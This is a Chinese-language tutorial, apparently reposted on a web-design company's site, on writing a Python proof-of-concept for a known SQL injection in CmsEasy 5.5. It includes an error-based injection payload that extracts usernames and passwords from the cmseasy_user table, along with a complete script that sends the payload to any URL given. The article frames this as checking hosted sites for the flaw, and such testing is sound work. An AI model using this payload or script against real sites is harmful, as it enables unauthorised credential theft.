小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!
成都創(chuàng)新互聯(lián)公司是專業(yè)的安達(dá)網(wǎng)站建設(shè)公司,安達(dá)接單;提供網(wǎng)站設(shè)計、成都網(wǎng)站設(shè)計,網(wǎng)頁設(shè)計,網(wǎng)站設(shè)計,建網(wǎng)站,PHP網(wǎng)站建設(shè)等專業(yè)做網(wǎng)站服務(wù);采用PHP框架,可快速的進(jìn)行安達(dá)網(wǎng)站開發(fā)網(wǎng)頁制作和功能擴(kuò)展;專業(yè)做搜索引擎喜愛的網(wǎng)站,專業(yè)的做網(wǎng)站團(tuán)隊(duì),希望更多企業(yè)前來合作!
0x00 我們需要掌握的幾個的概念
PoC(全稱:Proof of Concept)中文意思是“觀點(diǎn)證明”。在安全行業(yè)中PoC則是一段驗(yàn)證漏洞的程序,使我們能夠確認(rèn)這個漏洞是真實(shí)存在的。
Python,是一種面向?qū)ο?、解釋型計算機(jī)程序設(shè)計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎(chǔ)知識我們不做講解。
SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。
0x01 PoC編寫流程
場景還原:某網(wǎng)站托管公司,旗下托管了數(shù)萬個站點(diǎn),負(fù)責(zé)這些站點(diǎn)的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個站點(diǎn)使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗(yàn)證下。
·根據(jù)該漏洞詳情的描述,假設(shè)已知出現(xiàn)漏洞的CMS版本號為4.1,可以去其官網(wǎng)或者GitHub上去下載相對應(yīng)的版本。
·下載之后,模擬其服務(wù)器真實(shí)環(huán)境,本地進(jìn)行搭建。根據(jù)漏洞描述,進(jìn)行復(fù)現(xiàn),已SQL注入為例,重復(fù)提交不同的參數(shù),觀察不同的返回結(jié)果,同時注意如果該漏洞不存在出現(xiàn)的結(jié)果。
·根據(jù)漏洞復(fù)現(xiàn)的實(shí)際情況,進(jìn)行PoC的編寫。
·PoC寫完之后需要進(jìn)行相關(guān)的測試,已確保該P(yáng)oC的編寫沒有問題,比如測試靶機(jī)程序,以及不存在漏洞的程序。
0x02 SQL Injection poc編寫
已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細(xì)節(jié)比較詳細(xì)
(由于wooyun已經(jīng)暫停訪問,故不上鏈接了)。
·首先,我們需要下載其相關(guān)源碼,進(jìn)行本地搭建。
閱讀漏洞細(xì)節(jié),我們得知其url與payload如下:
URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20
·漏洞復(fù)現(xiàn):我們根據(jù)其漏洞描述,進(jìn)行復(fù)現(xiàn),該注入點(diǎn)需要發(fā)起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進(jìn)行復(fù)現(xiàn),填入url與payload,發(fā)送,獲取其賬戶密碼。
漏洞效果如下:
這樣,我們的漏洞就已經(jīng)復(fù)現(xiàn)成功了。接下來,我們來寫Poc。
#!/usr/bin/env python # coding:utf-8 import urllib2 import urllib import re import sys def verify(url): target = '%s/celive/live/header.php' % url #需要發(fā)送的數(shù)據(jù) post_data = { 'xajax': 'LiveMessage', 'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " } try: #發(fā)送請求 req = urllib2.Request(target, data=urllib.urlencode(post_data)) response = urllib2.urlopen(req) #處理請求,進(jìn)行判斷 if response: data = response.read() if "XPATH syntax error" in data: print "%s is vulnerable" % target else: print "%s is not vulnerable" % target except Exception, e: print "Something happend..." print e def main(): args = sys.argv url = "" if len(args) == 2: url = args[1] verify(url) else: print "Usage: python %s url" % (args[0]) if __name__ == '__main__': main()
看完了這篇文章,相信你對python中poc指的是什么意思有了一定的了解,想了解更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!
分享文章:python中poc指的是什么意思
網(wǎng)頁地址:http://aaarwkj.com/article26/ijhscg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務(wù)器托管、外貿(mào)建站、Google、網(wǎng)站制作、標(biāo)簽優(yōu)化、微信公眾號
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)